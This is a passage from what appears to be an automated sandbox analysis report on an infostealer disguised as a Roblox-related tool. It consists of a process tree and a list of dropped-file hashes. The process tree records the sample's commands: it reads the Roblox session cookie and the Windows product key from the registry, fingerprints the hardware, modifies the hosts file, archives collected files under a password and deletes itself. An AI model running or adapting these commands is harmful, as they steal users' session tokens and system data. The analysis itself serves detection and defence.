                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                5⤵
                                                  PID:3024
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    6⤵
                                                      PID:2904
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                    5⤵
                                                      PID:3948
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                                        6⤵
                                                        • Drops file in Drivers directory
                                                        • Views/modifies file attributes
                                                        PID:1728
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      5⤵
                                                        PID:2968
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          6⤵
                                                            PID:2520
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                          5⤵
                                                            PID:1164
                                                            • C:\Windows\system32\attrib.exe
                                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                                              6⤵
                                                              • Drops file in Drivers directory
                                                              • Views/modifies file attributes
                                                              PID:3844
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            5⤵
                                                              PID:3280
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                6⤵
                                                                  PID:3996
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                5⤵
                                                                  PID:4872
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    6⤵
                                                                      PID:740
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      tasklist /FO LIST
                                                                      6⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:3200
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                    5⤵
                                                                      PID:1856
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        6⤵
                                                                          PID:1996
                                                                        • C:\Windows\system32\tree.com
                                                                          tree /A /F
                                                                          6⤵
                                                                            PID:1008
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                          5⤵
                                                                            PID:4612
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                              6⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:4572
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                            5⤵
                                                                              PID:984
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                6⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:1500
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                              5⤵
                                                                                PID:1164
                                                                                • C:\Windows\system32\getmac.exe
                                                                                  getmac
                                                                                  6⤵
                                                                                    PID:2824
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4042\rar.exe a -r -hp"blank124" "C:\Users\Admin\AppData\Local\Temp\NaXCn.zip" *"
                                                                                  5⤵
                                                                                    PID:4140
                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI4042\rar.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI4042\rar.exe a -r -hp"blank124" "C:\Users\Admin\AppData\Local\Temp\NaXCn.zip" *
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1064
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                    5⤵
                                                                                      PID:4788
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic os get Caption
                                                                                        6⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4452
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                      5⤵
                                                                                        PID:4024
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic computersystem get totalphysicalmemory
                                                                                          6⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:224
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                        5⤵
                                                                                          PID:2312
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic csproduct get uuid
                                                                                            6⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:2120
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                          5⤵
                                                                                            PID:4652
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4392
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                            5⤵
                                                                                              PID:1096
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic path win32_VideoController get name
                                                                                                6⤵
                                                                                                • Detects videocard installed
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:1904
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                              5⤵
                                                                                                PID:1888
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                  6⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:1868
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe""
                                                                                                5⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                PID:5060
                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                  ping localhost -n 3
                                                                                                  6⤵
                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                  • Runs ping.exe
                                                                                                  PID:5016
                                                                                      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
                                                                                        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        PID:3296
                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                        C:\Windows\system32\AUDIODG.EXE 0x490 0x2f8
                                                                                        1⤵
                                                                                          PID:2580

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          ed30ca9187bf5593affb3dc9276309a6

                                                                                          SHA1

                                                                                          c63757897a6c43a44102b221fe8dc36355e99359

                                                                                          SHA256

                                                                                          81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122

                                                                                          SHA512

                                                                                          1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          670c4920a79e1c12a6c4e8ff4007562b

                                                                                          SHA1

                                                                                          5023e825d4a8af071498411f589f3b25ff335f0f

                                                                                          SHA256

                                                                                          37c4a07c009ffa6061e7ffcec01d0eb2c1a2c7ac94fc3d2208e1bfee6815c92f

                                                                                          SHA512

                                                                                          d717acfd4aea4d2788b06be081c00d97929eadaa97b9144ebc02617837d8c9ffaad30f3bef0a662c560dc2bc98603853af3404120f5ac2430335dda06e7c5bd5

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          b98abb38b02600943b7190c8c46a4bbb

                                                                                          SHA1

                                                                                          21c9cfc9f317d264a3d53237f607d327a2cb2cb4

                                                                                          SHA256

                                                                                          444d208a36a4dbeb1195f759faa5bc2ec276dbe773322f759d3bd098ef55ae1d

                                                                                          SHA512

                                                                                          a330316e042b86cffbae6bd3ed6e0e5a7ed463585a0e1295ad672ba368fd2afa148506117d1d8d6291002d0903d236e9de95f1e689a346ed9cc1e845b921ac0f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\9DD6.tmp\9DD7.tmp\9DD8.bat

                                                                                          Filesize

                                                                                          3KB

                                                                                          MD5

                                                                                          8bc1aa5da770fe954665c9741d374683

                                                                                          SHA1

                                                                                          ea351be0d527c5d6e00be7afe18ef919e68d4e26

                                                                                          SHA256

                                                                                          595d8de0909084260c65e6058d8ecc5dd825e6ccee647a78e08d3a99691b6109

                                                                                          SHA512

                                                                                          2489b6e3502c44866793d874ebd337f25eb9e5c6481f0557454ea52277655a947f23f028b9b2e12175f743c0cff3efabb6223610f59c8842a55d92d5671007f9

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux.zip

                                                                                          Filesize

                                                                                          16.4MB

                                                                                          MD5

                                                                                          d15bda7252ffbc9c40065bd5f8d7b7ab

                                                                                          SHA1

                                                                                          ef43f6da53465ec2aa58eaf69e54f4b1f5d580a0

                                                                                          SHA256

                                                                                          594a0adbd8aa6d31fd4e51e763f2757a2e911a20d4ff03d0abdeeb3648166670

                                                                                          SHA512

                                                                                          c0dec387ddaa35d09dd27dda562513d7fd2ab41f23a4c2c47673c351a4720ab4501a8ceff602490fc3df6f9b59cb249d50c9d456e9200ebcd6d78ff48ec602b7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe

                                                                                          Filesize

                                                                                          497KB

                                                                                          MD5

                                                                                          31b4656a1483d32bea23fb5fd6709886

                                                                                          SHA1

                                                                                          b196d8318d2c09b7f8fd3c1c44406734d361ed74

                                                                                          SHA256

                                                                                          07372183767988c4ba313b841e9e17ce9813383d6c99ff7e3bfe90077e3c6869

                                                                                          SHA512

                                                                                          20a21c2f99064be3501ca8838f6b6d9d0b2ea484f3a248a9cdcb55ed106fe942775676bcfefa53e5054743e462f532019dd1c00cfbfa4f9dfe46e47dad56e945

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe.WebView2\EBWebView\Default\DawnWebGPUCache\data_0

                                                                                          Filesize

                                                                                          8KB

                                                                                          MD5

                                                                                          cf89d16bb9107c631daabf0c0ee58efb

                                                                                          SHA1

                                                                                          3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                                                                                          SHA256

                                                                                          d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                                                                                          SHA512

                                                                                          8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe.WebView2\EBWebView\Default\DawnWebGPUCache\data_1

                                                                                          Filesize

                                                                                          264KB

                                                                                          MD5

                                                                                          5a6cfbdc3fe66faf6015d2435ffccd8e

                                                                                          SHA1

                                                                                          ad86de83174c76b509b46de7bfa2825034c0abfe

                                                                                          SHA256

                                                                                          94925f2a50d7cadfb9143bc6441a379e0e70becb5fee91a8d9c1534cf79b4408

                                                                                          SHA512

                                                                                          b2ecc662fdaadeec6edc8b95afd48fb5c4362d8ecaaaf15c3b5f4b9074c97a0874adb95d5621ff751df700474ac186ee390814e8d08e4aec0083477a408e63ad

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe.WebView2\EBWebView\Default\DawnWebGPUCache\data_2

                                                                                          Filesize

                                                                                          8KB

                                                                                          MD5

                                                                                          0962291d6d367570bee5454721c17e11

                                                                                          SHA1

                                                                                          59d10a893ef321a706a9255176761366115bedcb

                                                                                          SHA256

                                                                                          ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                          SHA512

                                                                                          f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe.WebView2\EBWebView\Default\DawnWebGPUCache\data_3

                                                                                          Filesize

                                                                                          8KB

                                                                                          MD5

                                                                                          41876349cb12d6db992f1309f22df3f0

                                                                                          SHA1

                                                                                          5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                                                          SHA256

                                                                                          e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                                                          SHA512

                                                                                          e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe.WebView2\EBWebView\Default\Extension State\CURRENT

                                                                                          Filesize

                                                                                          16B

                                                                                          MD5

                                                                                          46295cac801e5d4857d09837238a6394

                                                                                          SHA1

                                                                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                          SHA256

                                                                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                          SHA512

                                                                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe.WebView2\EBWebView\Default\Extension State\MANIFEST-000001

                                                                                          Filesize

                                                                                          41B

                                                                                          MD5

                                                                                          5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                          SHA1

                                                                                          d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                          SHA256

                                                                                          f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                          SHA512

                                                                                          de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe.WebView2\EBWebView\Default\Shared Dictionary\cache\index

                                                                                          Filesize

                                                                                          24B

                                                                                          MD5

                                                                                          54cb446f628b2ea4a5bce5769910512e

                                                                                          SHA1

                                                                                          c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                                                                                          SHA256

                                                                                          fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                                                                                          SHA512

                                                                                          8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\monacotabs.exe.WebView2\EBWebView\Default\Network\Cookies

                                                                                          Filesize

                                                                                          20KB

                                                                                          MD5

                                                                                          a156bfab7f06800d5287d4616d6f8733

                                                                                          SHA1

                                                                                          8f365ec4db582dc519774dcbbfcc8001dd37b512

                                                                                          SHA256

                                                                                          e87b3d155c7582d4c1d889308b58f84e8fe90a1581014b21b785d6694bd156cc

                                                                                          SHA512

                                                                                          6c8eeab3ae6fb0d5be7758cca521665b216f31aed1aeeeaf121c99dc9f0192b385de0da36e94f90dd4a9bbbac6be2c5a55d2f284a24ccb7dec2c5302fb9b027c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\monacotabs.pdb

                                                                                          Filesize

                                                                                          35KB

                                                                                          MD5

                                                                                          40c5a730adbf7b37732e3860a5e2fd45

                                                                                          SHA1

                                                                                          f8a323000063bc511ebb734255197f44fa988b84

                                                                                          SHA256

                                                                                          0163de2e8b64f3c7b9315c571747f251d0d3c9e00c3306ccb242e01d24ceebcf

                                                                                          SHA512

                                                                                          8e189e151acef3203172d42109c5fcab81dca7bff5e60b4271452bbc659db1d29058e34c762c035e1c50dcc20711c319b0c488b51912046cc7049bea43090251

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\runtimes\win-x64\native\WebView2Loader.dll

                                                                                          Filesize

                                                                                          162KB

                                                                                          MD5

                                                                                          0ad9319fa14d39c0812583337546ca20

                                                                                          SHA1

                                                                                          0a76b27dc44f46756984a7a5f93f9a9b024aedb5

                                                                                          SHA256

                                                                                          1d963a02d8a7fa3e7eac2e936dad5559c4d63327f35b0a09787ffc1d58f9c18d

                                                                                          SHA512

                                                                                          01bfb6516ea8d2347863fdf6de7ce1bc598d0798a7a388a0b4478a8be4bad66362185f366ed52adb19008f518c05fbaedf46268051bbf26e448e23b017af669f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\workspace\.tests\isfile.txt

                                                                                          Filesize

                                                                                          7B

                                                                                          MD5

                                                                                          260ca9dd8a4577fc00b7bd5810298076

                                                                                          SHA1

                                                                                          53a5687cb26dc41f2ab4033e97e13adefd3740d6

                                                                                          SHA256

                                                                                          aee408847d35e44e99430f0979c3357b85fe8dbb4535a494301198adbee85f27

                                                                                          SHA512

                                                                                          51e85deb51c2b909a21ec5b8e83b1cb28da258b1be227620105a345a2bd4c6aea549cd5429670f2df33324667b9f623a420b3a0bdbbd03ad48602211e75478a7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\VCRUNTIME140.dll

                                                                                          Filesize

                                                                                          106KB

                                                                                          MD5

                                                                                          870fea4e961e2fbd00110d3783e529be

                                                                                          SHA1

                                                                                          a948e65c6f73d7da4ffde4e8533c098a00cc7311

                                                                                          SHA256

                                                                                          76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

                                                                                          SHA512

                                                                                          0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\_ctypes.pyd

                                                                                          Filesize

                                                                                          56KB

                                                                                          MD5

                                                                                          813fc3981cae89a4f93bf7336d3dc5ef

                                                                                          SHA1

                                                                                          daff28bcd155a84e55d2603be07ca57e3934a0de

                                                                                          SHA256

                                                                                          4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06

                                                                                          SHA512

                                                                                          ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-console-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          e8b9d74bfd1f6d1cc1d99b24f44da796

                                                                                          SHA1

                                                                                          a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452

                                                                                          SHA256

                                                                                          b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59

                                                                                          SHA512

                                                                                          b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-datetime-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          cfe0c1dfde224ea5fed9bd5ff778a6e0

                                                                                          SHA1

                                                                                          5150e7edd1293e29d2e4d6bb68067374b8a07ce6

                                                                                          SHA256

                                                                                          0d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e

                                                                                          SHA512

                                                                                          b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-debug-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          33bbece432f8da57f17bf2e396ebaa58

                                                                                          SHA1

                                                                                          890df2dddfdf3eeccc698312d32407f3e2ec7eb1

                                                                                          SHA256

                                                                                          7cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e

                                                                                          SHA512

                                                                                          619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          eb0978a9213e7f6fdd63b2967f02d999

                                                                                          SHA1

                                                                                          9833f4134f7ac4766991c918aece900acfbf969f

                                                                                          SHA256

                                                                                          ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e

                                                                                          SHA512

                                                                                          6f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-file-l1-1-0.dll

                                                                                          Filesize

                                                                                          25KB

                                                                                          MD5

                                                                                          efad0ee0136532e8e8402770a64c71f9

                                                                                          SHA1

                                                                                          cda3774fe9781400792d8605869f4e6b08153e55

                                                                                          SHA256

                                                                                          3d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed

                                                                                          SHA512

                                                                                          69d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-file-l1-2-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          1c58526d681efe507deb8f1935c75487

                                                                                          SHA1

                                                                                          0e6d328faf3563f2aae029bc5f2272fb7a742672

                                                                                          SHA256

                                                                                          ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

                                                                                          SHA512

                                                                                          8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-file-l2-1-0.dll

                                                                                          Filesize

                                                                                          18KB

                                                                                          MD5

                                                                                          bfffa7117fd9b1622c66d949bac3f1d7

                                                                                          SHA1

                                                                                          402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

                                                                                          SHA256

                                                                                          1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

                                                                                          SHA512

                                                                                          b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-handle-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          e89cdcd4d95cda04e4abba8193a5b492

                                                                                          SHA1

                                                                                          5c0aee81f32d7f9ec9f0650239ee58880c9b0337

                                                                                          SHA256

                                                                                          1a489e0606484bd71a0d9cb37a1dc6ca8437777b3d67bfc8c0075d0cc59e6238

                                                                                          SHA512

                                                                                          55d01e68c8c899e99a3c62c2c36d6bcb1a66ff6ecd2636d2d0157409a1f53a84ce5d6f0c703d5ed47f8e9e2d1c9d2d87cc52585ee624a23d92183062c999b97e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-heap-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          accc640d1b06fb8552fe02f823126ff5

                                                                                          SHA1

                                                                                          82ccc763d62660bfa8b8a09e566120d469f6ab67

                                                                                          SHA256

                                                                                          332ba469ae84aa72ec8cce2b33781db1ab81a42ece5863f7a3cb5a990059594f

                                                                                          SHA512

                                                                                          6382302fb7158fc9f2be790811e5c459c5c441f8caee63df1e09b203b8077a27e023c4c01957b252ac8ac288f8310bcee5b4dcc1f7fc691458b90cdfaa36dcbe

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          c6024cc04201312f7688a021d25b056d

                                                                                          SHA1

                                                                                          48a1d01ae8bc90f889fb5f09c0d2a0602ee4b0fd

                                                                                          SHA256

                                                                                          8751d30df554af08ef42d2faa0a71abcf8c7d17ce9e9ff2ea68a4662603ec500

                                                                                          SHA512

                                                                                          d86c773416b332945acbb95cbe90e16730ef8e16b7f3ccd459d7131485760c2f07e95951aeb47c1cf29de76affeb1c21bdf6d8260845e32205fe8411ed5efa47

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          1f2a00e72bc8fa2bd887bdb651ed6de5

                                                                                          SHA1

                                                                                          04d92e41ce002251cc09c297cf2b38c4263709ea

                                                                                          SHA256

                                                                                          9c8a08a7d40b6f697a21054770f1afa9ffb197f90ef1eee77c67751df28b7142

                                                                                          SHA512

                                                                                          8cf72df019f9fc9cd22ff77c37a563652becee0708ff5c6f1da87317f41037909e64dcbdcc43e890c5777e6bcfa4035a27afc1aeeb0f5deba878e3e9aef7b02a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-localization-l1-2-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          724223109e49cb01d61d63a8be926b8f

                                                                                          SHA1

                                                                                          072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

                                                                                          SHA256

                                                                                          4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

                                                                                          SHA512

                                                                                          19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-memory-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          3c38aac78b7ce7f94f4916372800e242

                                                                                          SHA1

                                                                                          c793186bcf8fdb55a1b74568102b4e073f6971d6

                                                                                          SHA256

                                                                                          3f81a149ba3862776af307d5c7feef978f258196f0a1bf909da2d3f440ff954d

                                                                                          SHA512

                                                                                          c2746aa4342c6afffbd174819440e1bbf4371a7fed29738801c75b49e2f4f94fd6d013e002bad2aadafbc477171b8332c8c5579d624684ef1afbfde9384b8588

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI4042\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                          Filesize

                                                                                          21KB

                                                                                          MD5

                                                                                          321a3ca50e80795018d55a19bf799197

                                                                                          SHA1

